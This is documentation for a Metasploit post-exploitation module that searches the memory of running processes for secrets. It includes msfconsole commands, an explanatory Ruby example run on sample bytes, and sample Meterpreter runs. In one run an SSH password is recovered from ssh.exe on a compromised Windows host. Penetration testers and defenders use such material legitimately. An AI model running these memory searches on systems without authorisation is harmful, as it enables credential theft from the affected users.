
Vulnerable Application

This module searches the memory of running processes, using Meterpreter's stdapi_sys_process_memory_search command, for potentially sensitive data such as passwords.

Verification Steps

  1. Start msfconsole
  2. Get a Meterpreter session
  3. Do: use post/multi/gather/memory_search
  4. Do: set SESSION <Session ID>
  5. Do: set PROCESS_NAMES_GLOB <process_names_regex>
  6. Do: set PROCESS_IDS <Process ID>
  7. Do: set REGEX <regex>
  8. Do: run

Options

PROCESS_NAMES_GLOB

Regular expression used to target processes. (default: ssh.*)

PROCESS_IDS

Comma-delimited list of process IDs to search. (default: nil)

REGEX

Regular expression to search for within memory. (default: publickey,password.*)

MIN_MATCH_LEN

The minimum number of bytes to match. (default: 5)

MAX_MATCH_LEN

The maximum number of bytes to match. (default: 127)

REPLACE_NON_PRINTABLE_BYTES

Replace non-printable bytes with ".". (default: true)

SAVE_LOOT

Save the memory matches to loot. (default: true)
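The options above combine in a predictable way: REGEX selects the bytes, the reported buffer is cut at MAX_MATCH_LEN, hits shorter than MIN_MATCH_LEN are dropped, and non-printable bytes are rendered as ".". The Ruby below is an added illustration written for this page, not the module's code or the stdapi_sys_process_memory_search implementation: it applies those rules to a constructed byte buffer laid out like the ssh.exe match in the first scenario, so the match table can be read accurately (the base address, the helper names and the exact truncate/discard semantics of the two length options are assumptions). From the defender's side it also makes the underlying problem concrete: a password typed into an interactive client sits in that process's memory as plaintext until the buffer is overwritten.

```ruby
# Added illustration for this page, not the module's own code: how REGEX,
# MIN_MATCH_LEN, MAX_MATCH_LEN and REPLACE_NON_PRINTABLE_BYTES shape one
# reported match. It scans a constructed byte buffer, never a live process.

# Constructed stand-in for one memory region: a plaintext secret surrounded by
# NUL padding, laid out like the ssh.exe match shown in the scenarios.
SAMPLE_REGION = (
  "\x00\x00publickey,password\x00\x00\x00\x00" + "3" + "\x00\x00" +
  "myverysecretpassword\x00\x00\x00#\x00\x00\x00\x00\x00#\x00" +
  ("\x00" * 200) + "S\x00\x00"
).b

# REPLACE_NON_PRINTABLE_BYTES: bytes outside printable ASCII (0x20..0x7e)
# become "." so the buffer can be shown in a table without mangling it.
def render_buffer(bytes, replace_non_printable: true)
  return bytes.b unless replace_non_printable
  bytes.each_byte.map { |b| b.between?(0x20, 0x7e) ? b.chr : '.' }.join
end

# Applies REGEX to a region and returns one hash per surviving match with the
# fields the module prints (address, length, rendered buffer). Assumed
# semantics: MAX_MATCH_LEN truncates a match, MIN_MATCH_LEN discards it.
def search_region(region, base_addr, regex, min_match_len: 5,
                  max_match_len: 127, replace_non_printable: true)
  region = region.b
  results = []
  pos = 0
  while pos <= region.bytesize && (m = region.match(regex, pos))
    start = m.begin(0)
    raw = m[0].byteslice(0, max_match_len)          # MAX_MATCH_LEN cap
    if raw.bytesize >= min_match_len                 # MIN_MATCH_LEN filter
      results << {
        address: base_addr + start,
        length: raw.bytesize,
        buffer: render_buffer(raw, replace_non_printable: replace_non_printable)
      }
    end
    pos = [m.end(0), start + 1].max                  # always advance, even on an empty match
  end
  results
end

if __FILE__ == $PROGRAM_NAME
  # Assumed base address; on a real target it comes from the process's memory map.
  search_region(SAMPLE_REGION, 0x0A00060DEE, /publickey,password.*/).each do |r|
    printf("0x%016X  %-3d  %s\n", r[:address], r[:length], r[:buffer])
  end
end
```

Because `.*` in the default REGEX runs greedily to the end of the region (NUL bytes are matched by `.`), the reported length is almost always exactly MAX_MATCH_LEN, which is why every row in the scenarios shows 127; a tighter pattern such as `password[^\x00]*` would stop at the first NUL and report only the secret itself.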

Scenarios

Windows 10 - OpenSSH_9.4p1, OpenSSL 3.1.2 1 Aug 2023

In this scenario, the Windows target has used ssh.exe to connect to another host, authenticating with the password myverysecretpassword:

msf6 post(multi/gather/memory_search) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  3         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)

msf6 post(multi/gather/memory_search) > run session=-1 regex="publickey,password.*" process_ids='' process_names_glob="ssh.*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        ssh.exe (pid: 4292)

[*] Memory Matches for ssh.exe (pid: 4292)
======================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000000A00060DF0  127           "publickey,password......3.......myverysecretpassword....................#.........#..........  0x0000000A00000000   0x0000000000090000
                                   ...........S......................"

[*] Post module execution completed

Windows 10 - Python3 HTTP Server

In this scenario, the Windows target is running the http.server module in Python:

msf6 post(multi/gather/memory_search) > sessions

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  3         meterpreter x64/windows  DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB  192.168.112.1:4444 -> 192.168.112.129:55513 (192.168.112.129)
  
msf6 post(multi/gather/memory_search) > run session=-1 regex="GET /.*" process_ids='' process_names_glob="python.*|[Ww]indows[Tt]erminal.*"

[*] Running module against - DESKTOP-NO8VQQB\win10 @ DESKTOP-NO8VQQB (192.168.112.129). This might take a few seconds...
[*] Getting target processes...
[*] Running against the following processes:
        WindowsTerminal.exe (pid: 9168)
        python.exe (pid: 2816)

[*] Memory Matches for WindowsTerminal.exe (pid: 9168)
==================================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x00000121C3458649  127           "GET /.portable HTTP/1.1\" 200 -...::ffff:192.168.112.1 - - [17/Jan/2024 14:36:38] \"GET /favi  0x00000121C3449000   0x000000000001B000
                                   con.ico HTTP/1.1\" 404 -..windows-ter"

[*] Memory Matches for python.exe (pid: 2816)
=========================================

 Match Address       Match Length  Match Buffer                                                                                    Memory Region Start  Memory Region Size
 -------------       ------------  ------------                                                                                    -------------------  ------------------
 0x0000013A0E3017D1  127           "GET /.portable HTTP/1.1\" 200 -.....:.....Q.:...................0.Q.:...0.Q.:.....Q.:.....Q.:  0x0000013A0E270000   0x00000000000FF000
                                   ...pAR.:...pAR.:...0.Q.:...0.Q.:..."
 0x0000013A1063DC21  127           "GET /.portable HTTP/1.1\" 200 -...t-black.ico...`@l.:.....h.:..............&.............l.&.  0x0000013A105E0000   0x0000000000100000
                                   ....l.&.....l.&.....l.&......k.:..."
 0x0000013A1063E5B1  127           "GET /.portable HTTP/1.1\" 200 -...b.l.e...o.....P.c.:...s.e.r.s.\\.w.i.n.1.0.\\.s.c.o.o.p.\\.  0x0000013A105E0000   0x0000000000100000
                                   a.p.p.s.\\.w.i.n.d.o.w.s.-.t.e.r.m.i.n."
 0x0000013A1067EC41  127           "GET /Images/ HTTP/1.1\" 200 -...@.g.:...p..&....2.................012345........<li><a href=\  0x0000013A105E0000   0x0000000000100000
                                   "defaults.json\">defaults.json</a></l"
 0x0000013A106CADD0  127           "GET /.portable HTTP/1.1...p&.............x..:...P...:...0.l.:....ta$.e$j..k.:... lk.:........  0x0000013A105E0000   0x0000000000100000
                                   ...0.l.:......................&..."
 0x0000013A106CF940  127           "GET /.portable HTTP/1.1...........l.:...................Pf.&.....^.&......e.:................  0x0000013A105E0000   0x0000000000100000
                                   ....Sn&....s.......P.l.:...p..&..."

[*] Post module execution completed